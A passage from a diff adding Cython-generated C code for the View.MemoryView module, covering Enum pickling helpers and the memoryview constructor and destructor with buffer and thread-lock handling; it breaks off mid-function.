__Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_state); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_4 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + } + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.Enum.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_state); + __Pyx_XDECREF(__pyx_v__dict); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":16 + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_MemviewEnum_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_MemviewEnum_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 16, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 16, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 16, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.Enum.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_MemviewEnum_2__setstate_cython__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_MemviewEnum_2__setstate_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":17 + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle_Enum__set_state(self, __pyx_state) # <<<<<<<<<<<<<< + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 17, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle_Enum__set_state(__pyx_v_self, ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.Enum.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":349 + * cdef __Pyx_TypeInfo *typeinfo + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): # <<<<<<<<<<<<<< + * self.obj = obj + * self.flags = flags + */ + +/* Python wrapper */ +static int __pyx_memoryview___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_memoryview___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_obj = 0; + int __pyx_v_flags; + int __pyx_v_dtype_is_object; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_obj,&__pyx_n_s_flags,&__pyx_n_s_dtype_is_object,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_obj)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_flags)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 2, 3, 1); __PYX_ERR(1, 349, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dtype_is_object); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(1, 349, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_obj = values[0]; + __pyx_v_flags = __Pyx_PyInt_As_int(values[1]); if (unlikely((__pyx_v_flags == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + if (values[2]) { + __pyx_v_dtype_is_object = __Pyx_PyObject_IsTrue(values[2]); if (unlikely((__pyx_v_dtype_is_object == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 349, __pyx_L3_error) + } else { + __pyx_v_dtype_is_object = ((int)0); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 2, 3, __pyx_nargs); __PYX_ERR(1, 349, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_obj, __pyx_v_flags, __pyx_v_dtype_is_object); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj, int __pyx_v_flags, int __pyx_v_dtype_is_object) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + Py_intptr_t __pyx_t_4; + size_t __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "View.MemoryView":350 + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): + * self.obj = obj # <<<<<<<<<<<<<< + * self.flags = flags + * if type(self) is memoryview or obj is not None: + */ + __Pyx_INCREF(__pyx_v_obj); + __Pyx_GIVEREF(__pyx_v_obj); + __Pyx_GOTREF(__pyx_v_self->obj); + __Pyx_DECREF(__pyx_v_self->obj); + __pyx_v_self->obj = __pyx_v_obj; + + /* "View.MemoryView":351 + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): + * self.obj = obj + * self.flags = flags # <<<<<<<<<<<<<< + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + */ + __pyx_v_self->flags = __pyx_v_flags; + + /* "View.MemoryView":352 + * self.obj = obj + * self.flags = flags + * if type(self) is memoryview or obj is not None: # <<<<<<<<<<<<<< + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + */ + __pyx_t_2 = (((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self))) == ((PyObject *)__pyx_memoryview_type)); + if (!__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_obj != Py_None); + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "View.MemoryView":353 + * self.flags = flags + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) # <<<<<<<<<<<<<< + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None + */ + __pyx_t_3 = __Pyx_GetBuffer(__pyx_v_obj, (&__pyx_v_self->view), __pyx_v_flags); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 353, __pyx_L1_error) + + /* "View.MemoryView":354 + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) + */ + __pyx_t_1 = (((PyObject *)__pyx_v_self->view.obj) == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":355 + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_self->view))->obj = Py_None; + + /* "View.MemoryView":356 + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + */ + Py_INCREF(Py_None); + + /* "View.MemoryView":354 + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) + */ + } + + /* "View.MemoryView":352 + * self.obj = obj + * self.flags = flags + * if type(self) is memoryview or obj is not None: # <<<<<<<<<<<<<< + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + */ + } + + /* "View.MemoryView":358 + * Py_INCREF(Py_None) + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): # <<<<<<<<<<<<<< + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + */ + __pyx_t_1 = (!__PYX_CYTHON_ATOMICS_ENABLED()); + if (__pyx_t_1) { + + /* "View.MemoryView":360 + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: # <<<<<<<<<<<<<< + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + */ + __pyx_t_1 = (__pyx_memoryview_thread_locks_used < 8); + if (__pyx_t_1) { + + /* "View.MemoryView":361 + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: + */ + __pyx_v_self->lock = (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]); + + /* "View.MemoryView":362 + * if __pyx_memoryview_thread_locks_used < 8: + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 # <<<<<<<<<<<<<< + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + */ + __pyx_memoryview_thread_locks_used = (__pyx_memoryview_thread_locks_used + 1); + + /* "View.MemoryView":360 + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: # <<<<<<<<<<<<<< + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + */ + } + + /* "View.MemoryView":363 + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: # <<<<<<<<<<<<<< + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + */ + __pyx_t_1 = (__pyx_v_self->lock == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":364 + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() # <<<<<<<<<<<<<< + * if self.lock is NULL: + * raise MemoryError + */ + __pyx_v_self->lock = PyThread_allocate_lock(); + + /* "View.MemoryView":365 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + __pyx_t_1 = (__pyx_v_self->lock == NULL); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":366 + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + * raise MemoryError # <<<<<<<<<<<<<< + * + * if flags & PyBUF_FORMAT: + */ + PyErr_NoMemory(); __PYX_ERR(1, 366, __pyx_L1_error) + + /* "View.MemoryView":365 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + } + + /* "View.MemoryView":363 + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: # <<<<<<<<<<<<<< + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + */ + } + + /* "View.MemoryView":358 + * Py_INCREF(Py_None) + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): # <<<<<<<<<<<<<< + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + */ + } + + /* "View.MemoryView":368 + * raise MemoryError + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_FORMAT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":369 + * + * if flags & PyBUF_FORMAT: + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') # <<<<<<<<<<<<<< + * else: + * self.dtype_is_object = dtype_is_object + */ + __pyx_t_2 = ((__pyx_v_self->view.format[0]) == 'O'); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L12_bool_binop_done; + } + __pyx_t_2 = ((__pyx_v_self->view.format[1]) == '\x00'); + __pyx_t_1 = __pyx_t_2; + __pyx_L12_bool_binop_done:; + __pyx_v_self->dtype_is_object = __pyx_t_1; + + /* "View.MemoryView":368 + * raise MemoryError + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + */ + goto __pyx_L11; + } + + /* "View.MemoryView":371 + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + * self.dtype_is_object = dtype_is_object # <<<<<<<<<<<<<< + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 + */ + /*else*/ { + __pyx_v_self->dtype_is_object = __pyx_v_dtype_is_object; + } + __pyx_L11:; + + /* "View.MemoryView":373 + * self.dtype_is_object = dtype_is_object + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 # <<<<<<<<<<<<<< + * self.typeinfo = NULL + * + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_4 = ((Py_intptr_t)((void *)(&__pyx_v_self->acquisition_count))); + __pyx_t_5 = (sizeof(__pyx_atomic_int_type)); + if (unlikely(__pyx_t_5 == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 373, __pyx_L1_error) + } + __pyx_t_1 = ((__pyx_t_4 % __pyx_t_5) == 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 373, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 373, __pyx_L1_error) + #endif + + /* "View.MemoryView":374 + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 + * self.typeinfo = NULL # <<<<<<<<<<<<<< + * + * def __dealloc__(memoryview self): + */ + __pyx_v_self->typeinfo = NULL; + + /* "View.MemoryView":349 + * cdef __Pyx_TypeInfo *typeinfo + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): # <<<<<<<<<<<<<< + * self.obj = obj + * self.flags = flags + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":376 + * self.typeinfo = NULL + * + * def __dealloc__(memoryview self): # <<<<<<<<<<<<<< + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + */ + +/* Python wrapper */ +static void __pyx_memoryview___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_memoryview___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(struct __pyx_memoryview_obj *__pyx_v_self) { + int __pyx_v_i; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + PyThread_type_lock __pyx_t_5; + PyThread_type_lock __pyx_t_6; + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":377 + * + * def __dealloc__(memoryview self): + * if self.obj is not None: # <<<<<<<<<<<<<< + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + */ + __pyx_t_1 = (__pyx_v_self->obj != Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":378 + * def __dealloc__(memoryview self): + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) # <<<<<<<<<<<<<< + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + * + */ + __Pyx_ReleaseBuffer((&__pyx_v_self->view)); + + /* "View.MemoryView":377 + * + * def __dealloc__(memoryview self): + * if self.obj is not None: # <<<<<<<<<<<<<< + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":379 + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: # <<<<<<<<<<<<<< + * + * (<__pyx_buffer *> &self.view).obj = NULL + */ + __pyx_t_1 = (((Py_buffer *)(&__pyx_v_self->view))->obj == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":381 + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + * + * (<__pyx_buffer *> &self.view).obj = NULL # <<<<<<<<<<<<<< + * Py_DECREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_self->view))->obj = NULL; + + /* "View.MemoryView":382 + * + * (<__pyx_buffer *> &self.view).obj = NULL + * Py_DECREF(Py_None) # <<<<<<<<<<<<<< + * + * cdef int i + */ + Py_DECREF(Py_None); + + /* "View.MemoryView":379 + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: # <<<<<<<<<<<<<< + * + * (<__pyx_buffer *> &self.view).obj = NULL + */ + } + __pyx_L3:; + + /* "View.MemoryView":386 + * cdef int i + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: # <<<<<<<<<<<<<< + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + */ + __pyx_t_1 = (__pyx_v_self->lock != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":387 + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): # <<<<<<<<<<<<<< + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + */ + __pyx_t_2 = __pyx_memoryview_thread_locks_used; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":388 + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + */ + __pyx_t_1 = ((__pyx_memoryview_thread_locks[__pyx_v_i]) == __pyx_v_self->lock); + if (__pyx_t_1) { + + /* "View.MemoryView":389 + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 # <<<<<<<<<<<<<< + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + */ + __pyx_memoryview_thread_locks_used = (__pyx_memoryview_thread_locks_used - 1); + + /* "View.MemoryView":390 + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + */ + __pyx_t_1 = (__pyx_v_i != __pyx_memoryview_thread_locks_used); + if (__pyx_t_1) { + + /* "View.MemoryView":392 + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) # <<<<<<<<<<<<<< + * break + * else: + */ + __pyx_t_5 = (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]); + __pyx_t_6 = (__pyx_memoryview_thread_locks[__pyx_v_i]); + + /* "View.MemoryView":391 + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + * break + */ + (__pyx_memoryview_thread_locks[__pyx_v_i]) = __pyx_t_5; + (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]) = __pyx_t_6; + + /* "View.MemoryView":390 + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + */ + } + + /* "View.MemoryView":393 + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + * break # <<<<<<<<<<<<<< + * else: + * PyThread_free_lock(self.lock) + */ + goto __pyx_L6_break; + + /* "View.MemoryView":388 + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + */ + } + } + /*else*/ { + + /* "View.MemoryView":395 + * break + * else: + * PyThread_free_lock(self.lock) # <<<<<<<<<<<<<< + * + * cdef char 